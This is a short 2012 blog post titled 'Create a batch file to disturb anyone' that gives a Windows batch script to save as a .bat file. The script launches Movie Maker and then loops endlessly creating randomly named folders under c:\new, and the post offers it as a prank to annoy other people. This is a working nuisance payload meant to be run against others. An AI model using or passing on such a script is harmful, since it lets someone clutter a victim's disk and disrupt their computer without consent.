Friday 24 August 2012

CREATE A BATCH FILE TO DISTURB ANYONE

CREATE A BATCH FILE TO DISTURB ANYONE



write this code in a notepad and save it to any name .bat
You can also give a custom path

Example:- abhijeet.bat

This code ->

@echo off
"C:\Program Files\Movie Maker\moviemk.exe"
:ui
md c:\new\%random%
goto ui



0 comments:

Post a Comment